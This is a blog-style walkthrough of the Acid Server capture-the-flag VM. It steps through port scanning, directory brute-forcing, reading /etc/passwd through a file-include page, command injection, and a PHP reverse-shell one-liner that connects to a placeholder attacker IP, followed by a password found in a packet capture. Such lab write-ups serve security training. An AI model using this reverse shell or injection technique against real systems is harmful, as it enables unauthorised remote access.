Acid Server is a web based vulnerable virtual machine which was designed like a CTF (Catch The Flag) for pentesters. If you are interested in web based exploits, then you are in a right place. The description of ACID Server in Vulnhub is as follows :

Welcome to the world of Acid.

Fairy tails uses secret keys to open the magical doors.

ACID server download links: Vulnhub Server  | SYDL Server |  Torrent

CTF Goal :

Boot2Root (Gain root access)

Requirements :


  1. VMware or Virtual Box
  2. Netdiscover
  3. Nmap
  4. DirBuster
  5. Netcat
  6. Knowledge of webshell
  7. Internet connection (for googling)

Step 1 :

First of all we don’t know the IP of the ACID server, so we use the utility called netdiscover.

《ACID Server VM Walkthrough》

From netdiscover we came to know that IP of the ACID Server is 192.168.207.129

Step 2 :

Now lets scan all the ports of this machine (well this would take a lot of time, so a little advice….run it and have a cup of coffee).

《ACID Server VM Walkthrough》

(Oh! the coffee was great) Looks like it took 6250 seconds.

《ACID Server VM Walkthrough》

The nmap results shows that port 33447 is open with http service.

Step 3 :

Now lets open it in a browser.

《ACID Server VM Walkthrough》

The server’s home page is shown with a path on the Title.


If we would view the source of this page then, we can get the 1st Flag.

Step 4 :

Now lets go to the path that was mentioned in the Title (http://192.168.207.129:33447/Challenge/), we would get the following page.

《ACID Server VM Walkthrough》

Oops!!! we don’t know the email or the password. What should we do? Lets ask the developers 🙂 They give a big help in understanding the codes.

First of all lets go to the source code of the page.

《ACID Server VM Walkthrough》

We would get the above page, showing all the HTML, Javascript and CSS code in that page.

Lets check all the one by one and eventually we would land on the forms.js page. Its a Javascript page which contains the creators name and website.


《ACID Server VM Walkthrough》

Now that we got the name of the creators (peredur.net) , lets start googling it. We would get a Github page of the company/creators. In the github page, if we read it, we would find a dummy email and password.

《ACID Server VM Walkthrough》

Lets try out the dummy email and password in the login page and we would get a successful login page.

《ACID Server VM Walkthrough》

Step 5 :

Lets proceed further, when we click “Click Here to Proceed Further”, we would land on the following page.

《ACID Server VM Walkthrough》

It asks for a file name, so we can view any file we want (which is accessible to www-data). But the most relevant is to know the list of users present in the system, so lets hunt for the passwd file.

《ACID Server VM Walkthrough》

When we give the path of the passwd file then we get “nothing”. Don’t get confuse here!!

《ACID Server VM Walkthrough》

The is hidden in plan view, its just that we need to between the lines. So lets march on the HTML (view source).

《ACID Server VM Walkthrough》

Yoooo!!!! we got a two useful usernames :- acid and saman.


Step 6 :

Now that we are done on the include page, lets get more file and folders on the current folder i.e., Challenge.

Here we would use the tool provided by OWASP called DirBuster.

Note :- DirBuster is very noisy.

This would also take quite a while, so lets go and watch and listen a song which is one of my favorites (its a Japaneses Song), Binks’ Sake

《ACID Server VM Walkthrough》

Looks like we got some results.

So, lets move on with the cake.php and we should get the following page.


《ACID Server VM Walkthrough》

If we observe carefully at title of this page, then we see a path i.e., /Magic_Box. But sadly its inaccessible.

《ACID Server VM Walkthrough》

Step 7 :

Lets again rely on our noisy tool DirBuster. This time we would it on the Magic_Box . Now lets not be idle and watch a crazy song “Crazy Frog“.

《ACID Server VM Walkthrough》

Looks like DirBuster raided the and gave use a very nice results.

Lets check the command.php page.

《ACID Server VM Walkthrough》

Yoooohhhoooo!!!! Great page right. This page is a jackpot to hackers. Lets play some old school tricks.

《ACID Server VM Walkthrough》

The result is hidden in the plain view.

《ACID Server VM Walkthrough》

Yupee!! Its injectable. So lets try creating a reverse shell using php, We can get it from google when we search for “one line simple php reverse shell”. Well I tried may codes but the best was :

php -r ‘$sock=fsockopen(“ATTACKING-IP”,80);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Before going to the webshell, we would be using the swiss knife i.e., netcat, for listen on the attacker’s machine.

《ACID Server VM Walkthrough》

Now lets start the webshell.

《ACID Server VM Walkthrough》

We would get a reverse connection on our listening port of netcat (if everything is correctly filled).

《ACID Server VM Walkthrough》

Now lets get a TTY shell by using the following command.

python -c 'import pty; pty.spawn("/bin/bash")'

《ACID Server VM Walkthrough》

Now finally we need to get the root access. So we would find something that would be useful to gain the root access, like sudo users. Lets see if we can change user. (As we know who are the users in this system).

《ACID Server VM Walkthrough》

Nice we can change the user. As we don’t know the password, lets search for the password. Now where can we find the user’s pass, lets play around for a while.

First lets see, what files are present on the system and find some suspicious files (that should not be present in ).

《ACID Server VM Walkthrough》

Well in root (/) we find s.bin to be suspicious, lets check it out.

《ACID Server VM Walkthrough》

Oh! we found something, investigate.php. Lets see what it has to say.

《ACID Server VM Walkthrough》

Nice, lets become an investigator and check out other files that are culprit. Lets check what is present in original sbin.

《ACID Server VM Walkthrough》

In sbin, raw_vs_isi looks different. What is it? Lets check it out

《ACID Server VM Walkthrough》

Oh! we found a hint. What it’s in .pcapng? What should we do? Lets do strings on it.

《ACID Server VM Walkthrough》

Hurreee!!! we found somethings. Lets it out.

《ACID Server VM Walkthrough》

This is creepy! “saman and now a days he’s … 1337hax0r”. We know that saman is the user and what is 1337hax0r. Lets try it as a password.

《ACID Server VM Walkthrough》

Nice its works!!! Now just we need to escalate the privilege.

Congrats!!! victory…

Yo-hohoho, Yo-hohoho Yo-hohoho, Yo-hohoho Yo-hohoho, Yo-hohoho

Binkusu no sake wo, todoke ni yuku yo ……

I hope you enjoyed the journey and leave some comments.